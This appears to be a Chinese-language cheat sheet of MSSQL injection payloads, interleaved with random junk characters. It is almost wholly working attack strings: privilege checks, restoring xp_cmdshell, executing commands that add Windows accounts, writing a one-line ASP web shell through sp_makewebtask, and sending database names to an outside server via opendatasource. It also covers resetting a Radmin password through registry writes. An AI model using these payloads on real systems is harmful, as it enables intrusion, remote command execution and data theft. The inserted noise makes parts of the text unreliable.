阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
8 t3 Y" b# W' u! h6 s6 d//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
; R- ?$ g5 a/ l- E' w0 T9 DAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
0 \0 r; u8 q: m
$ n  {+ }5 p  p& C( r3 S# v//检测是否有读取某数据库的权限
9 e2 g4 M9 Q) c2 ~# v" ?9 f3 ?and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


" J8 f; ?' M' |) H( ]数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
6 G+ Q7 P( l/ N6 b. @4 Z" D" Y" V) R5 t' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
3 s) _0 T: B& A8 i: m( @8 C' n
+ J9 }; m6 ~( f, H爆用户名
0 X# F+ t. P' ~) g" U" ^$ Iand user>0
' and user>0 and ''='

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

* b  h6 d  w- t. |- a9 y检测是不是MSSQL数据库
; I! W% T$ b4 |# k% M/ aand exists (select * from sysobjects);--

* l- k; g! O) N# ]4 ^" [  R0 s检测是否支持多行
1 W' V, L: v, K0 ^% m- b9 _;declare @d int;--
$ \! n  n5 N5 l- s  A
  m9 N( r6 n3 g6 p# L+ w4 j; y' b恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

  E) B% u% n9 S! v/ \4 \: r8 F9 W//-----------------------
% i  V9 [: P8 K# e! o//      执行命令
6 j) B+ I! q/ ?, T" c//-----------------------
- `1 E2 e$ l6 E7 S( b首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

0 n4 u3 v6 O0 g, i4 L然后利用jet.oledb执行系统命令
! R/ y8 f' ^% a9 A- O" |select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

- a6 S  x' i* B& z9 k执行命令
; z+ b; G2 w& c, m7 P;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
2 d) \9 U3 T( V: e2 i6 c2 V6 ]& T+ N% g
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
/ E& e1 U6 E' q. i% J- ?
6 e5 }, L( I' P, L: F' o! n5 r判断xp_cmdshell扩展存储过程是否存在：
: v# p1 n8 L. B' a& r* Bhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
5 [0 u1 }" e$ z4 y, ]
写注册表
) m- N! V' D# @+ v/ q# zexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

9 E8 S. w( ^) I) J" wREG_SZ

* V$ W) t4 p+ x/ I- L读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1
7 d, T) L, t/ e2 k, |% f/ K
6 w: l6 r; i8 [" I# A/ H  u5 E5 D% [
数据库备份
/ }0 _* x. ^+ dbackup database pubs to disk = 'c:\123.bak'

$ O. [" v. \0 ^$ K' g; P//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

, _3 ]* D! _  K/ u

8 Z. b1 j- P3 P$ a3 [更改sa口令方法：用sql综合利用工具连接后，执行命令：
) p( x' ]8 y1 d5 I5 z' `0 Bexec sp_password NULL,'新密码','sa'
# E6 u$ A5 k; Z; r8 R
9 Z+ _& `$ ]% P" K( |( n4 S( x添加和删除一个SA权限的用户test：
9 d5 R# W' x& G) F, t7 \exec master.dbo.sp_addlogin test,ptlove
! M" k- E+ ~% b. Q( _exec master.dbo.sp_addsrvrolemember test,sysadmin
- n# @: ^. f0 s) O' T
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
& B+ ~" p, _1 V, I
添加扩展存储过过程
, d/ S; w, p7 t# O# E7 E3 a( GEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public


停掉或激活某个服务。
! p! o+ [8 Q! E4 k" Q3 X6 y, n8 k  r1 p
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
- v) M. V0 ^, L& }  k+ E* P' a6 ~
dbo.xp_subdirs

5 o5 b: c; b! Y7 g, e' u& t只列某个目录下的子目录。
, y3 h  C: g+ k5 V: o' P5 lxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
0 U( x' T7 f) P& l( F& R, d
  @  m, |3 }: s4 C- Pdbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
/ S7 A$ L+ |8 u9 G'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

2 }0 T  Y! U% R5 p" d* J: T停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
0 L9 N; ]& o) R& L' D7 Q" {* [
3 K" t% C0 b, a& Zxp_terminate_process 2484

xp_unpackcab
9 t: g! i1 g7 Y' P
解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1

7 k3 j: m2 l" B& d# `# }4 N# ~1 c
某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
* ^. k- c0 }1 ?* v
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
  F/ `8 @/ b& `7 A
6 I6 m: y, S3 R- z. v//得到数据库名
4 g8 C; e. x& \, ?1 p6 S. l5 @! pinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
% {2 \$ F# \6 ~/ H
- I, _' x' a7 E9 S/ o  ^4 L$ ?7 s5 T
5 T6 \. K" T; ~9 o//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
, a+ d- Y* v& ?! Z
4 Y& y5 C: W  d9 h4 D  M4 K1 s+ X$ V用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表内容
$ u8 Z+ M6 h" ^Update films SET kind = 'Dramatic' Where id = 123

//删除内容
" _) ]- i! `# Q  K/ A& l5 [" Q1 `4 Ddelete from table_name where Stockid = 3